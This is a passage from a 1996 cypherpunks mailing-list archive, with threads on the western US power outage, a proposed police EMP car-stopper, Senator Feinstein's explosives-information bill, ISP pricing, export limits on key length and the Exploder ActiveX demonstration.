From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 13 Aug 1996 01:22:23 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: [off-topic] Re: US Power Outages
In-Reply-To: <v02120d13ae347585efdc@[192.0.2.1]>
Message-ID: <199608121325.JAA01788@nrk.com>
MIME-Version: 1.0
Content-Type: text


It looks to me as if, what with all the earthquakes out there,
that some of those high voltage poles have tipped into the right
hand plane....



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 13 Aug 1996 01:32:30 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Police prepare stunning e
Message-ID: <199608121156.EAA02006@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



 pjn@nworks.com writes:
Someone writes:
>> The car stopper works by focusing an intense electromagnetic
>> charge on the electronic systems that manage most modern
>> engines, disabling them and paralysing the car. In the jargon
>> of its inventors, the 150 kilovolt charge is a nemp, or non-nuclear
>> electromagnetic pulse. Contractors are bidding to produce a
>> police version.  
 
>  Is there any dif between this and a HERF gun?

Only that this is pretty real, while "HERF guns" have only appeared
in science fiction novels, and in newspaper articles which seem
to be from the 'Weekly World News' school of journalism.

Go over the the amateur radio newsgroups, and you'll find that the
interference of mobile ham radios with car ignitions is a well
known issue.

On a more speculative note,  many years ago Harlan Ellison
wrote an anti-statist short story entitled '"Repent Harlequin!"
cried the Tick-Tock Man.' , in which the government required
all adults to be surgically fitted with 'cardioplates', which 
allowed the state to turn off the hearts of  uncooperative
citizen-units by radio.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 13 Aug 1996 12:39:31 +0800
To: cypherpunks@toad.com
Subject: Re: Police prepare stunning end for high-speed car chases
Message-ID: <ae35140a07021004ebf2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:46 PM 8/12/96, snow wrote:
>On Sat, 10 Aug 1996, Gary Howland wrote:

>>       Will old fashioned engines be outlawed?
>>       Will the "stun guns" be outlawed?
>>       Will susceptible electronic systems become mandatory?
>>       (and if so, why not just put a remote control switch in all cars?)
>
>    One word: Pacemakers.

Not just pacemakers, but also cars losing steering control (but not forward
speed, obviously) and thus plow into crowds. And airbags that perhaps get
triggered in all the ruckus, breaking the necks of infants (as has
happened).

Think of the liablility issues! Deliberately causing a car to lose control.
Mon Dieu!

I'm skeptical that this EM cannon will get deployed anytime soon.

(And I'm not ignorant of such technologies, having attended several of the
Nuclear and Space Radiation Effects Conferences. I also played around with
this as a minor plot element in a novel I was working on several years ago,
namely, a character killed in Los Alamos when the Electronic Engine Control
circuitry of his BMW was zapped while on a mountain road. This, by the way,
is a "side effect" of widely deploying such EM cannon technologies--people
using them on twisty mountain roads. I can think of some places near Big
Sur and around Devil's Slide where such a gizmo would produce real
interesting effects!)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "I=(!isnum(self))" <geeman@best.com>
Date: Tue, 13 Aug 1996 04:54:08 +0800
To: cypherpunks@toad.com
Subject: don't say "bomb" on the internet
Message-ID: <320F625E.1744@best.com>
MIME-Version: 1.0
Content-Type: text/plain


Below is from EFF source.

Does anyone have specifics on where this piece of idiocy is supposedly
going from here?  When does Congress reconvene on this issue?

Any specific activities going on regarding this piece of crap?


[begin quote]========================================================================


This is the language that Feinstein inserted into the Defense 
Authorization Act.  It has been passed by the Senate.  This is not
good, but significantly different from her first effort last Spring (a 
similar amendment, to the S.735 anti-terrorism bill of 1995). This
language is technology-neutral.  However, it does have a very slippery
'intent' or 'knowledge' standard, and though the language of the bill 
does not directly focus on the Internet, all of Feinstein's commentary on 
the Senate floor and to the press have focused exclusively on 
"bomb-making information" on the Internet.  Though this new version of 
her Net censorship proposal is possibly constitutional, unlike the 
earlier one, a key question that all constituents and journalists need to 
ask of Sen. Feinstein is: If you are simply trying to criminalize online 
incitement of, or conspiracy to commit, murder by bomb, then what on 
earth does this bill do?  Both of these things are *already illegal* 
online or offline.



                                           S.1762

Department of Defense Authorization Act for Fiscal Year 1997 (Passed by the
Senate)

SEC. 1088. PROHIBITION ON THE DISTRIBUTION OF INFORMATION
RELATING TO EXPLOSIVE MATERIALS FOR A CRIMINAL PURPOSE.

       (a) UNLAWFUL CONDUCT- Section 842 of title 18, United States Code,
is amended by adding at the end the
       following new subsection:

       `(l) It shall be unlawful for any person to teach or demonstrate the
making of explosive materials, or to distribute by any means information
pertaining to, in whole or in part, the manufacture of explosive materials,
if the person intends or knows, that such explosive materials or
information will be used for, or in furtherance of, an activity that
constitutes a Federal criminal offense or a criminal purpose affecting
interstate commerce.'.

       (b) PENALTY- Section 844(a) of title 18, United States Code, is 
amended--

              (1) by striking `(a) Any person' and inserting `(a)(1) Any
person'; and

              (2) by adding at the end the following:

       `(2) Any person who violates subsection (l) of section 842 of this
chapter shall be fined under this title, imprisoned not more than 20 years,
or both.'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ericd@shop.internet.net (Eric Davis)
Date: Tue, 13 Aug 1996 07:32:12 +0800
To: cypherpunks@toad.com
Subject: Re: US Power Outages
Message-ID: <v02140b00ae350fc71d8b@[205.179.23.30]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 PM 8/11/96, Bill Stewart wrote:

>It surprises me how little these systems appear to be monitored.
>It took some hours for them to decide that the brush fire on the
>California border didn't cause the system to shut down;
>you'd think they'd know quickly that the subsystem shut itself down
>or disconnected from the grid or whatever because of reason #17...

The fire "story" was, I guess, a result of excessive media fodder.
(whatever sells the headlines....)

Example: This morning (Monday 7:00am PST)
STATION A: Replayed a recorded press briefing, with a head from PG&E,
stating that the cause is *not* yet known, however it *MIGHT* have something
to do with the excessive loads/demands on the system during the high
temp season. (AC units running, etc..)
       -- minutes later --
STATION B: A newsperson *read* the news. This person stated, "At a recent
press briefing, a PG&E official said the outage *WAS* caused by excessive loads.
(quoting the same briefing that I just heard, from the source, on STATION A)

Thank you Mass Media!

Eric

Reminds me of the aftermath of the last large SF quake.
I lived in Santa Cruz at the time. After the quake we all kicked
back and had a large yard party to kill the time. An, un-named, news
network was broadcasting, nation wide, live telephone calls from people
in the SF area. One call was from a person in Santa Cruz, or so he said.
He told the news network, and at the same time live to the nation, that
Santa Cruz was completely leveled, dead bodies everywhere, and only a
handfull of people seemed to have survive.
Needless to say my Grandparents in Tennessee were not to excited...

-----------------------------------------------------
Eric Davis                        ericd@cyberfarm.com
Co-Founder MediaCast:       http://www.mediacast.com/
-----------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Aug 1996 05:52:35 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: US Power Outages
Message-ID: <199608121716.KAA09849@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 PM 8/11/96 -0700, Bill Stewart wrote:
>At 06:15 PM 8/11/96 -0400, Dave Farber wrote:
>>attempt to explain that blackout and how to prevent such. We have not
>>progressed very far. The avalanche behavior of power systems is still not
>>well understood and techniques to prevent such failures are not obvious.
>
>It surprises me how little these systems appear to be monitored.
>It took some hours for them to decide that the brush fire on the
>California border didn't cause the system to shut down;
>you'd think they'd know quickly that the subsystem shut itself down
>or disconnected from the grid or whatever because of reason #17...


The story previously being promoted says that approximately at the 
Oregon/California border, a fire caused problems with the transmission line.

This morning, I read the new claim: extreme heat (presumably assisted by 
heat dissipated in the power line itself) cause the power cables near The 
Dalles (about 100 miles east of Portland, along the Columbia river) to 
stretch and sag, eventually shorting themselves out to trees near the ground.

I find this claim EXTREMELY hard to believe. The temperature coefficient of 
expansion of steel is about 10 ppm/degree C, which means that even if the 
power lines heated up 200 degrees C, that's only 2000 ppm longer, or about 
0.2%    I don't know the formula to determine the length of a catenary, and 
I'm too lazy to look it up right now,  but I'd imagine that this 0.2% 
increase in length won't increase the amount of sag by more than a factor of 
10 higher, or 2%.   That amount should be almost ignorable if the power line 
was competently installed and maintained.



>One of my concerns about the situation is that it's only a week
>or two after Clinton's speech about how The Government needs to protect the
>National Information Infrastructure for us.  I'm not paranoid enough
>to think that they did it, but I'm sure that within a week we'll
>see Al Gore or somebody making an NII Protection Agency speech
>and Louis Freeh explaining that we need enhanced wiretap underwriting
>to make sure that encryption-wielding hackers don't do it again.


I've long believed that if incidents such as these were the work of 
saboteurs, it is in the interest of the ordinary citizen that communication 
with those responsible is maintained.  If, on the other hand, the fact of 
the sabotage is covered up, that will only lead to more.  The government, on 
the other hand, has an illegitimate interest in seeing it hidden (where it 
can be hidden; and where the government can't see a good reason to publicize 
it), because if uncovered it would tend to force the government to actually 
deal with the dissatisfied citizenry: not merely the ones doing the 
sabotage, but also the ones who have heard what their motivations are and at 
least partly agree with them. 



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ericd@shop.internet.net (Eric Davis)
Date: Tue, 13 Aug 1996 06:17:55 +0800
To: cypherpunks@toad.com
Subject: Re: US Power Outages
Message-ID: <v02140b01ae3515f69181@[192.195.4.226]>
MIME-Version: 1.0
Content-Type: text/plain



Also remember that you have to deal with capacitive/bleedoff issues as well.

It is hard to throw the off switch to an active 500,000 volt/??amp
transmission line, esp under heavy load. The power in transit has
gotta go somewhere.

This gets even more fun when you deal with long haul DC transmission
systems. These systems are the basis for a *very* large capacitor.
MILES of flown wire, air dielectric, and earth.

As metioned below, most all of the protection systems are in the
"protect my local equipment" mode.

So what do you do? The basis today is to watch voltage, current, and
waveform (freq/shape stability). "Protect mode" happens if one is too far
out of wack.

It would take far too much time to cross ref local data against other
remote monitoring stations to confirm validity. The time required to check
the data
would result in local system damage. Lets also not forget to protect the
power yard worker(s) standing under the entrance busses when the surge comes
knocking!

Eric


At 12:22 AM 8/12/96, Jim McCoy wrote:
>Lucky (crypto-leprechaun) wrote:
>> At 18:15 8/11/96, Dave Farber wrote:
>> >The avalanche behavior of power systems is still not
>> >well understood and techniques to prevent such failures are not obvious.
>> >Same can be said of telephone and computer networks at different levels.
>>
>> Does somebody here have a pointer to literature on this topic? A system in
>> which small localized disturbances can amplify, propagate through the
>> system, leading to catastrophic failure is the worst of all possible
>> designs. I fail to understand why a system as important as the power grid
>> would display this type of behavior. Why is the grid negatively dampened?
>
>Because the system designed to fail non-destructively rather than risk
>a power surge.  Part of the problem is that the power being controlled
>moves as fast as any information about the state of the network: all
>decisions must be made locally at the switch level.  When a major line
>fails the power generation stations can not just "turn off the juice" at
>the speed required, the power must either be redistributed or else the
>switch overloads and shuts down to prevent a massive power spike.  The
>power companies would rather face the ire of consumers without power for
>an evening than the outcry that would happen if every toaster, microwave,
>and computer on the west coast was fried by the spike caused by 3 gigawatts
>being dumped into grids that could not handle the load (not to mention the
>long-term blackouts caused by local switching equipment getting fried.)
>In this case the system must fail to prevent damage.
>
>The great east coast blackout was caused by a $50 switch which wore out.
>The switch happened to control a chunk of load which was re-routed on to
>another line, causing a cascade failure as the excess load caused other
>switches to fail when it was dumped on to those lines (and the excess
>load caused by these other switches tripping accellerated the failure.)
>Power distribution is not like telecom, if a phone switch dies the calls
>end; the failure does not endanger the upstream switch with overload
>from bits not going anywhere.
>
>Imagine that cars on highways had no brakes until they reached an offramp
>but the DOT could apply a kill-switch to segments between offramps (tying
>this thread into another non-crypto thread on the list :),if a failure in
>the roadway caused traffic to stop then all of the upstream traffic would
>have to be dumped off the road via offramps that were only one or two lanes.
>This would cause further bottlenecks and the kill-switch would need to be
>applied to more and more segments upstream to prevent the traffic stopped
>or being slowly bled off from causing more problems.  No imagine that
>offramp-to-offramp messages were transmitted via messengers travelling
>upstream in the carpool lane :)
>
>Even the power company's secret experiments in the cores of nuclear reactors
>have not found a way to get around the 186,000 km/s speed limit on everything.
>
>jim

-----------------------------------------------------
Eric Davis                        ericd@cyberfarm.com
Co-Founder MediaCast:       http://www.mediacast.com/
-----------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Aug 1996 06:29:07 +0800
To: cypherpunks@toad.com
Subject: Re: Unmetered Net Usage
Message-ID: <199608121741.KAA11226@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 8/11/96 -0700, Timothy C. May wrote:

>
>Will "unmetered" usage go away? It depends on a lot of factors. Right now,
>unmetered usage is a big enough marketing draw that it appears to
>outcompete metered usage plans. Sure, there are people like me who pay a
>flat rate (in my case, $20/month) and yet who are on for several hours a
>day. But the subscribers who also pay the $20/mo and yet who are on only
>briefly to check their mail are not clamoring to switch to metered usage.
>
>If Internet telephony becomes a big deal, I still suspect unmetered usage
>will be common. If the capacity isn't there, from the ISP through the
>various links to the other person's ISP then there will be stalls and
>delays. Think of it as evolution in action, like crowded freeways.

We need to consider separately costs of unmetered access to the ISP, and 
unmetered access to the Internet.  I expect that the main reason for these 
limited-time plans have little to do with Internet traffic, and a lot to do 
with local phone link limits.

One big cost for at least small ISPs is local telephone lines.  Due to the 
"infinite wisdom" of rate commissions, business-line charges are 
substantially higher than residential.  (and ISP's are businesses...)   A 
person who uses 6 hours per day of connection to his ISP is occupying at 
least 1/4th of the capacity of one phone line, and given typical circadian 
usage patterns, in practice he's using 1/3rd or more.  If the ISP's cost for 
that telephone line is $30 per month, then that user must be charged $10 per 
month for this service just to cover this cost.  That customer, however, 
might only be using a rather tiny fraction of the ISP's actual Internet-line 
capacity, except possibly when his Internet telephone is operating.  Also, 
the customer isn't inclined to occupy his own telephone for this length of 
time, either, especially if he has only one line.

So it seems to me that within 5 years or so, there ought to be a powerful 
incentive to wire up apartment complexes and business parks with alternative 
Internet/Internet-telephone connections, ones which bypass the phoneco for 
at least the first few hundred feet.  This, possibly in concert with a 
ISDN-driving concentrator or a cable-modem, should reduce the cost of the 
customer-to-the-ISP line to a very low value.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Tue, 13 Aug 1996 03:32:24 +0800
To: cypherpunks@toad.com
Subject: Re: Read; NOW
Message-ID: <2.2.32.19960812154732.00704a10@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 PM 8/11/96 -0400, Unix_Code <unix_code@geocities.com> wrote:
>        Hi I'm Unix Code and have a few things to ask...

Ok, go ahead... we're waiting... I thought you had a few things to ask?

>                                                        (it may not go with
>Cryptography but go ahead and read)

Maybe I read it too fast.  Not only did it have nothing to do with crypto,
but I could not ascertain as to it's relevance to anything whatsoever.

- I'm sorry, C-Punks; I couldn't resist, but I did keep it short.
Vagab0nd<br>
<a href="http://ww2.sd.cybernex.net/~vagab0nd/index.html">Visit web page for
public key.</a>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David.K.Merriman@toad.com,       "webmaster@www.shellback.com" <merriman@amaonline.com>
Date: Tue, 13 Aug 1996 10:32:56 +0800
To: support@luckman.com
Subject: 1024-bit keys
Message-ID: <199608121758.KAA09620@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: support@luckman.com, cypherpunks@toad.com
Date: Mon Aug 12 14:29:39 1996
In the documentation for Web Commander (page 7-50, item 19, top of page), 
under the process for getting a digital ID from VeriSign, you state:

"Also, please note that you cannot send keys longer than 512 to servers 
outside the United States."

I would like to ask for clarification on this point. Is this meant to say 
that a server inside the United States is not allowed to use a 512+ bit key 
with a client outside the U.S., or that a Web Commander server outside the 
U.S. may not employ a key of greater than 512 bits? In either case, what is 
the justification for such a statement/restriction? If a Federal 
regulation, could you please cite the Title and Section?

Thank you.

David Merriman

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED. Visit my web
site at         http://www.shellback.com/p/merriman
for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest
with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMg7PWsVrTvyYOzAZAQFo3QQAn2stH5ZtI2/SGt2qEwTWyhTnp6cMA3qC
hsukc3tEcvkaF75G2fdPdPkt/oyMpwU+X6jKk6kttbNNPSShrs7QtKgOoZS4FSU1
Zj+5sKrjUmluonly3JRJeZdIzWOOWGz6wd1pDBn90X9M9LzY+CBJT+yuoCWGVmh4
LJkvCJBkLrc=
=b+Ui
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 13 Aug 1996 02:44:47 +0800
To: <cypherpunks@toad.com
Subject: Re: India, Productivity, and Tropical Climes
Message-ID: <199608121315.GAA03303@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim writes:
>Arun Mehta writes:
> 
[huge snip]
> >My prediction is that with the blessings of the Internet, the
> >next generation of multiracial programmers, even those that were
> >born in the USA, will be more likely to be found on the beaches
> >of tropical islands than in the fog of San Francisco. When you
> >can work in the shade of a palm tree, even if you should earn
> >less, it's worth it :-)
 
> As attractive as this sounds, historically this has not happened. And as
> many will tell you, the climate of the Bay Area in particular and
> California in general is extremely benign and delightful. The average
> winter temperature is only about 10C cooler than summer temperatures.
> Evenings are not balmy, but neither are they oppressively hot.

'Oppressive' is a subjective term, and is largely defined by what one is 
used to. Personally, I find the Bay area's climate very boring, too dry, and
usually too hot (and yes, I've been there many times, at all parts of the
year - I'm speaking from experience). Due to the lack of rain, the whole
country side also seems much dirtier than a place where everything,
both natural and artificial, gets a regular washing.

> Interestingly, and not really related to CP themes, the fact is that is
> that most technological developments have come out of cooler climes. Not a
> lot of stuff from tropical and island climes. Maybe they realize life is
> too good eating roast pig at the beach luau, maybe they are too lethargic
> from the heat, maybe tropical diseases and mosquitos have taken their toll,
> maybe....

The last time I heard this argument was in a documentary film
about South African mining and agriculture, produced by South Africans, 
during the height of apartheid 'these great natuaral resources lay 
untapped until the arrival of a more industrious people, tempered by 
a colder climate...'

While there *is* some truth that people living in environments where 
survival does not depend on long-term planning have less pressure to
develop sophisticated industry, to claim that average temperature is the
main determinate is betrays an ignorance of history.

The technological pre-emminence of Northern Europe and derivative
cultures is a very recent phenomenom. Civilization was invented in
hot climates, and for most of history the more sophisticated cultures 
were in locations where you could sweat any time of the year - the
Mediterranean basin, Mesopotamia, India, coastal China, Central
America - in fact, in the classical period you could have mapped
out a 'civilized belt' surrounding the globe in a distinctly sub-tropical
climate.
 
> I know an awful lot of folks who could easily affort to move to almost
> anywhere in the world, and yet they stay in California. (I also know folks
> moving to even cooler climes, in the U.S., especially less-crowded areas.)

In any place you can name, most of the people who can afford to move to
other areas do not do so. By your argument, Kuwait should be totally 
depopulated by now. 
 
> --Tim May

Peter Trei
trei@process.com

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Reusch <reusch@pluto.njcc.com>
Date: Tue, 13 Aug 1996 02:37:59 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199608121502.LAA04167@pluto.njcc.com>
MIME-Version: 1.0
Content-Type: text/plain




is now doing internet telephony (www.von.com). Who isn't?  They have developed a

set of voice morphing tools (www.voxware.com/meta.htm) and I quote:



"Morph-It offers an alternative. Morph-It allows multimedia developers and users to actually 

change, in real time, the character of encoded speech by altering resonance, pitch, timbre and 

other voice personality elements. With Morph-It, pitch and resonance can be altered 

independently. All these changes can be made and saved using a simple editor, and 

transformed voices can be stored as easy-to-apply VoiceFonts.



Morph-It can be used for a variety of purposes: 



Multiple voice personalities can be created from a single voice recording.

Users in "real-time" applications can disguise or alter their voices to enhance game- and 

role-playing.

Vocal character can be easily transformed into virtually any form, whether from male to 

female, or from a child's to an adult's." 



End quote.



I have not heard it work. Imagine drunken suits, in karioki bars, sounding 

like drunken Pavarottis,  disk jockeys whose true voices are nasel whines, 

talking-heads and telemarketers using highly tuned voice-clones, home-alone children 

answering the phone as John Wayne.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dan Siemon" <dsiemon@cyg.net>
Date: Tue, 13 Aug 1996 03:26:58 +0800
To: <cypherpunks@toad.com>
Subject: Re: Fun with M$
Message-ID: <199608121526.LAA07380@granite.cyg.net>
MIME-Version: 1.0
Content-Type: text/plain




----------
> From: Rich Graves <llurch@networking.stanford.edu>
> To: cypherpunks@toad.com
> Subject: Re: Fun with M$
> Date: Friday, August 09, 1996 8:46 PM
> 
> On Fri, 9 Aug 1996, Jeremey Barrett wrote:
> 
> > Information page with a link to a page which loads the control:
> > 
> > 	http://www.halcyon.com/mclain/ActiveX/
> > 
> > Quote from the page:
> > 
> > Exploder is an Active X control which demonstrates security problems
with 
> > Microsoft's Internet Explorer. Exploder performs a clean shutdown of 
> > Win95 and will turn off the power on machines that have a power
> > conservation BIOS (green machines).

I don't see how anyone can call this a bug. Microsoft has chosen what Sun
should have: leave the security to the user, don't take it away from
everyone. Java has been sverly crippled by the removal of features that
would have made applets truly usefull, like local disk access. By leaving
these abilities and allowing the user to choose whether or not to run the
object, leaves the trusted objects to be truly usefull. Microsoft has even
designed a system of trust verification for these objects throught the
trust chain and the MS download service. For details on the MS download
service look at the july 96 issue of Microsoft Systems Journal. Security
should be a user/parent decision not a general ban to protect a few.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 13 Aug 1996 12:43:55 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Newspapers and basic science (was: US Power Outages)
Message-ID: <ae3526be0902100450ca@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 PM 8/12/96, Z.B. wrote:
>Well, all I remember is the 3-1/2 Seattles part - I put the"for a day"
>part in because I wasn't sure about it.
>

Well, by putting in that "for a day" line, you made the news folk seem even
more ignorant than they actually may be! It was the "for a day" that made
the quote seem so stupid, as Ian's point below makes clear. (I had read
this stupid quote and just deleted the message, rather than get into the
difference between power and the integral of power.)

In the future, you might try leaving quotes alone, without improvements.

(One way is to add comments such as "[for a day?]", which readers can then
accept or reject as they wish.)

--Tim


>On 12 Aug 1996, Ian Goldberg wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>>
>> <GRUMBLE>
>> Watts are a measure of energy per unit time; it makes sense to say
>> "60 W powers a light bulb", not "60 W powers a light bulb for one hour".
>> </GRUMBLE>

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Tue, 13 Aug 1996 07:09:23 +0800
To: cypherpunks@toad.com
Subject: Re: FCC_ups
Message-ID: <199608121836.LAA04772@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Disclaimer: All opinions are my own, I do not speak for Ameritech
or it's alliance partners.

Lucky Green writes:

>I am glad to see some movement in this area. I designed a similar
>system for a previous employer of mine. But the real choke point
>is the local loop. As of this day, the local telos still have a de
>facto monopoly in the local markets. The new competitors (the same
>old Phone Company) that we will see in the near future seem to
>show no desire to deliver the really interesting services that are
>now possible. They long distance carriers about to enter the local
>markets plan to offer the same old stuff at a (perhaps) somewhat
>lower price.

 First I would like to mention Lucky that I always enjoy your
posts. Second I would like to say that as I have mentioned
previously, the RBOC I work for filed for complete unbundling of
the local loop in March of 93. We are not the one's holding up the
show. 

>The company I used to work for has technology capable of
>delivering a 10 Mb/s Ethernet plus 100 ISDN B channels to your
>home, using the very same wires already in your wall. Keep this in
>mind next time you hear what great new services the local telcos
>are about to offer. Then demand better.

10 Mb/s ethernet and 100 ISDN B channels (64k each)? I would
certainly like to here more! Unfortunately as I have also
previously pointed out, point-to-point copper is a thing of the
past, it is rare and expensive now. The current fiber-to-the-curb
standard involves "slick 96" muxes which use 4 framed T-1's (1.536
Mb/s) to provide 96 voice channels.

Thanks for the info.

Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Farber <farber@central.cis.upenn.edu>
Date: Tue, 13 Aug 1996 06:30:52 +0800
To: zachb@netcom.com>
Subject: Re: [off-topic] Re: US Power Outages
Message-ID: <2.2.32.19960812154246.00baecb8@linc.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


I dnt have the reference handy bit IEEE Spectrum published in about May 66 a
real good description of why the Great Northeast Blackout happened.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 13 Aug 1996 06:01:01 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: Police prepare stunning end for high-speed car chases
In-Reply-To: <199608101504.RAA03459@internal-mail.systemics.com>
Message-ID: <Pine.LNX.3.93.960812114406.3627P-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 10 Aug 1996, Gary Howland wrote:
> Police prepare stunning end for high-speed car chases 
                                                                             |
     Could you please format your posts to 78 columns? It makes it difficult
to read on a standard terminal. 
>                                     BY GILES WHITTELL 
>                                     AND NIGEL HAWKES 
>          A high-powered electrical device under development at the Pentagon's Army Research
>          Laboratory in Adelphi, Maryland, is to be tested by police and border patrol agents and
>          even stop heart pacemakers. There is also the danger of loss of control when a car is
>          being driven at high speed. 
>          Counter-measures would include using old-fashioned engines with no electronics, or
>          perhaps surrounding the most delicate components with shielding. The best might be to
>          get hold of one of the stun guns and use it to disable pursuing police vehicles. 
> Original article at http://www.the-times.co.uk/news/pages/Times/timnwsnws01022.html?1060389
> 	Will old fashioned engines be outlawed?
> 	Will the "stun guns" be outlawed?
> 	Will susceptible electronic systems become mandatory?
> 	(and if so, why not just put a remote control switch in all cars?)

    One word: Pacemakers.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Mon, 12 Aug 1996 20:10:06 +0800
To: cypherpunks@toad.com
Subject: Re: Fw: SafE Mail Corporation
In-Reply-To: <Pine.GUL.3.95.960809175133.15098C-100000@Networking.Stanford.EDU>
Message-ID: <Pine.GSO.3.93.960812120202.2158C-100000@nebula.online.ee>
MIME-Version: 1.0
Content-Type: text/plain


 Fri, 9 Aug 1996, Rich Graves wrote:

> I notice they've "sweetened" their "hacker" deal for cracking their
> software. Now it's an all-expense-paid trip to North Carolina plus about
> $400. Still not worth it, unless you're just pissed off.

Well if they would pay all expences of my trip from Estonia to US and
back, I might like to do it. Or someone else far away ...

Only thing I do not believe the _will_ pay for it so I better continue my
summer holidays.

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Tue, 13 Aug 1996 08:19:25 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Read; NOW
Message-ID: <199608122006.NAA07504@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 11 Aug 96 23:24:24 -0800, unix_code@geocities.com wrote:


>        Hi I'm Unix Code and have a few things to ask...(it may not go with
>Cryptography but go ahead and read)

I won't say anything if you won't...

# Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
# Automatically receive my resume or PGPKEY by sending email with a subject
# of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
# Web site: http://www.io-online.com/adamsc/adamsc.htp
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Aug 1996 08:35:17 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Article on Electronic Commerce with a few too many assumptions
Message-ID: <199608122000.NAA19713@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 PM 8/11/96 EDT, E. ALLEN SMITH wrote:
>[Permit me to recommend that you read this very interesting draft paper
>and send its author, Andrew Odlyzko, detailed comments.]
>                            Andrew Odlyzko
>                         AT&T Labs - Research
>                         amo@research.att.com
>                   Preliminary version, August 9, 1996

[lotsa stuff deleted]
>
>There are many examples in the marketplace of behavior that appears 
>even less fair.  For example, in 1990, IBM introduced the LaserPrinter 
>E, a lower cost version of its LaserPrinter.  The two version were
>identical, except that the E version printed 5 pages per minute
